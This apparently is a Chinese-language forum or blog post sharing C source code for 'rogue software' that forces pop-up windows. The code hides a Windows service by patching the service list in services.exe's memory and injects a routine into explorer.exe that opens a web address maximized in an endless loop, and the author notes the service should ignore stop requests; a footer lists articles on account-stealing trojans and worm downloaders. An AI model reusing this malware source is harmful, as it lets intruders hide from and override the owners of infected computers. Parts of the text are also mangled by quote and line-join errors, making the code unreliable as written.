|
[推荐]一个弹窗口的流氓软件源码
/**************************************************************************************************
* 记录日志函数
**************************************************************************************************/
#ifdef DEBUG
void LogToFile( WCHAR *str )
{
FILE *fp;
fp = fopen( DEBUG_LOG, “a” );
fwprintf( fp, L”%s\n”, str );
fclose( fp );
}
#endif
这个是隐藏服务用的,修改了services.exe文件,可能有一定的危险性。
代码:
// yunshu(pst) Copy from zzzevazzz(pst)’s code
// 几个Undocument的结构
typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;
typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;
typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;typedef struct _SC_SERVICE_PROCESS
{
PSC_SERVICE_PROCESS Previous;
PSC_SERVICE_PROCESS Next;
WCHAR *ImagePath;
DWORD Pid;
DWORD NumberOfServices;
// …
} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;typedef struct _SC_DEPEND_SERVICE
{
PSC_DEPEND_SERVICE Next;
DWORD Unknow;
PSC_SERVICE_RECORD Service;
// …
} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;typedef struct _SC_SERVICE_RECORD
{
PSC_SERVICE_RECORD Previous;
PSC_SERVICE_RECORD Next;
WCHAR *ServiceName;
WCHAR *DisplayName;
DWORD Index;
DWORD Unknow0;
DWORD sErv;
DWORD ControlCount;
DWORD Unknow1;
PSC_SERVICE_PROCESS Process;
SERVICE_STATUS Status;
DWORD StartType;
DWORD ErrorControl;
DWORD TagId;
PSC_DEPEND_SERVICE DependOn;
PSC_DEPEND_SERVICE Depended;
// …
} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;BOOL SetDebugPrivilege()
{
BOOL bRet = FALSE;
HANDLE hToken = NULL;
LUID luid;
TOKEN_PRIVILEGES tp;if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
}if (hToken) CloseHandle(hToken);
return bRet;
}DWORD GetProcessIdByName(WCHAR *Name)
{
BOOL bRet = FALSE;
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
DWORD Pid = -1;hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcessSnap) return -1;pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
do
{
if ( !_wcsicmp(pe32.szExeFile, Name ) )
{
Pid = pe32.th32ProcessID;
break;
}
}
while (Process32Next(hProcessSnap, &pe32));
}CloseHandle(hProcessSnap);
return Pid;
}// 修改内存属性为指定值
void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)
{
MEMORY_BASIC_INFORMATION mbi;
DWORD dwOldProtect, dwWritten;VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);
WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
}//寻找服务链表
PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)
{
WCHAR FileName[MAX_PATH+1];
HANDLE hFile, hFileMap;
UCHAR * pMap;
DWORD dwSize, dwSizeHigh, i, dwRead;
SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;GetSystemDirectory( FileName, MAX_PATH );
wcscat( FileName, L”\Services.exe”);hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, 0, NULL);
if (INVALID_HANDLE_VALUE == hFile) return NULL;dwSizeHigh = 0;
dwSize = GetFileSize(hFile, &dwSizeHigh);hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
if (NULL == hFileMap) return NULL;pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);
if (NULL == pMap) return NULL;dwSize -= 12;
for (i=0; i<dwSize; ++i)
{
// 搜索services!ScGetServiceDatabase特征代码
if (*(DWORD*)(pMap+i) == 0xa1909090 &&
*(DWORD*)(pMap+i+8) == 0×909090c3)
{
#ifdef DEBUG
WCHAR tmpBuffer[256] = { 0 };
wsprintf( tmpBuffer, L”map is 0x%08x\n”, (DWORD *)(pMap+i) );
LogToFile( tmpBuffer );
#endifif (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&
ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
SvcRd.sErv == ‘vrEs’) // ServiceRecord结构的特征
{
pRet = pSvcRd;#ifdef DEBUG
WCHAR tmpBuffer[256] = { 0 };
wsprintf( tmpBuffer, L”pRet is 0x%08x\n”, (DWORD *)(pSvcRd) );
LogToFile( tmpBuffer );
#endifbreak;
}
}
}UnmapViewOfFile(pMap);
CloseHandle(hFileMap);
CloseHandle(hFile);//printf( “addr: 0x%08x\n”, (DWORD *)pRet );
return pRet;
}// 隐藏服务
BOOL HideService( WCHAR *Name )
{
DWORD Pid;
HANDLE hProcess;
SC_SERVICE_RECORD SvcRd, *pSvcRd;
DWORD dwRead, dwNameSize;
WCHAR SvcName[MAX_PATH] = { 0 };dwNameSize = ( wcslen(Name) + 1 ) * sizeof(WCHAR);
if (dwNameSize > sizeof(SvcName)) return FALSE;
Pid = GetProcessIdByName( TEXT(”Services.exe”) );
#ifdef DEBUG
WCHAR tmpBuffer1[256] = { 0 };
wsprintf( tmpBuffer1, L”Pid is %d\n”, Pid );
LogToFile( tmpBuffer1 );
#endifif (Pid == -1) return FALSE;
if( ! SetDebugPrivilege() ) return FALSE;
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
if (NULL == hProcess) return FALSE;pSvcRd = FindFirstServiceRecord(hProcess);
if (NULL == pSvcRd)
{
#ifdef DEBUG
LogToFile( L”Can’t Find ServiceDatabase.\n” );
#endifCloseHandle(hProcess);
return FALSE;
}do
{
if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead))
{
// 匹配服务名
if ( 0 == _wcsicmp(SvcName, Name) )
{
// 从链表中断开(一般来说ServiceRecord是可写的,但还是先改保护属性以防万一)
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next);
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);#ifdef DEBUG
WCHAR tmpBuffer2[256] = { 0 };
wsprintf( tmpBuffer2, L”The Service \”%s\” Is Hidden Successfully.\n”, Name );
LogToFile( tmpBuffer1 );
#endifCloseHandle(hProcess);
return TRUE;
}
}
else
{
break;
}
}
while (pSvcRd = SvcRd.Next);if( NULL != hProcess )
{
CloseHandle(hProcess);
}return FALSE;
}
这个是注入到explorer.exe进程中的代码,大部分参数是写内存写进去的,有少部分实在懒得搞了,用了一点汇编。
代码:
typedef struct _Arguments
{
char MyUrl[512];
char MyProgram[512];
FARPROC MyLoadLibrary;
FARPROC MyGetAddress;
char MyKernelDll[32];
char MyShellDll[32];
char MyZeroMemory[32];
char MyShellExecute[32];
DWORD SleepTime;
}Arguments;/**************************************************************************************************
* WINAPI函数原形
**************************************************************************************************/
typedef HMODULE (__stdcall *LOADLIBRARYA)( IN char* lpFileName );
typedef FARPROC (__stdcall *GETPROCADDRESS)( IN HMODULE hModule, IN char* lpProcName );
typedef void (__stdcall *ZEROMEMORY)( IN PVOID Destination, IN SIZE_T Length );void __stdcall CustomFunction( LPVOID my_arguments )
{
Arguments *func_args = (Arguments *)my_arguments;LOADLIBRARYA LoadLibraryA = (LOADLIBRARYA)func_args->MyLoadLibrary;
GETPROCADDRESS GetProcAddress = (GETPROCADDRESS)func_args->MyGetAddress;HMODULE h_kernel = LoadLibraryA( func_args->MyKernelDll );
HMODULE h_shell = LoadLibraryA( func_args->MyShellDll );ZEROMEMORY ZeroMemory = (ZEROMEMORY)GetProcAddress( h_kernel, func_args->MyZeroMemory );
DWORD MyShellExecuteA = (DWORD)GetProcAddress( h_shell, func_args->MyShellExecute );
DWORD MySleep;
DWORD sleep_time = func_args->SleepTime;__asm
{
push eax
push espsub esp, 6
mov byte ptr [esp], ‘S’
mov byte ptr [esp+1], ‘l’
mov byte ptr [esp+2], ‘e’
mov byte ptr [esp+3], ‘e’
mov byte ptr [esp+4], ‘p’
mov byte ptr [esp+5], ”
lea eax, [esp]push eax
push h_kernel
call GetProcAddress
mov MySleep, eaxadd esp, 6
pop esp
pop eax
}while( 1 )
{
__asm
{
push eax
push esp
push ecx
push ebxsub esp, 256
mov byte ptr [esp], ‘o’
mov byte ptr [esp+1], ‘p’
mov byte ptr [esp+2], ‘e’
mov byte ptr [esp+3], ‘n’
mov byte ptr [esp+4], ”
lea ebx, [esp]push SW_SHOWMAXIMIZED
push 0
push func_argsmov ecx, func_args
add ecx, 200h
lea eax, [ecx]
push eaxpush ebx
push 0call MyShellExecuteA
add esp, 256
pop ebx
pop ecx
pop esp
pop eaxpush sleep_time
call MySleep
}
}
}
这个是控制服务的,正常的服务程序都有的代码,流氓软件应该不接受停止服务请求。
| 网游盗号木马实现手记 | 01-09 |
| 黑色技术蠕虫下载者[完整源码] | 11-01 |
| 利用BCB自己打造QQ炸弹 | 10-23 |
| 从内存中加载并启动一个exe(delp | 09-27 |
| 开启和关闭Windows xp 防火墙(de | 09-27 |
| 让你的程序通过XP防火墙(delphi编 | 09-27 |
| 如何让你的程序安全通过windows防 | 08-20 |
| 如何透过程序来控制 Windows (XP | 08-20 |
| 动易2005-2006算号器的源代码 | 08-11 |
| API对注册表进行操作(Delphi编程 | 07-30 |
| 一段隐藏注册表项的代码 | 07-26 |
| 了解VB编写病毒的大体方法 | 07-02 |
您现在的位置: